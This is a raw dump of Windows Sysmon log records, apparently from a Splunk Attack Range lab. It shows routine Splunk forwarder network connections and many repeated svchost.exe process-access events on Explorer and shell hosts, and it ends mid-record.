Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCBF0158B050E5FE2624DFFCF897AD95,SHA256=7891A868AA77CA1D4DAB60D93257F865C47D82D06750551B5A96166DC64F71B8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215894Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:39.540{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51290-false10.0.1.12-8000- 354300x8000000000000000286996Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:40.534{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53378-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000215895Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:43.147{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32EC8C2BAACA75A2E9E3D071655BB26D,SHA256=0B0101E9C93E06868718FFFBF04427AFACCDFD6848A9F7872FFD06D4C09E8EDE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287032Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287031Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287030Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287029Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287028Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287027Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287026Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287025Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287024Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287023Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287022Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287021Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287020Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287019Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287018Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287017Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287016Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287015Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287014Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287013Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287012Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287011Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287010Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287009Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287008Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287007Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287006Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287005Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287004Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287003Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 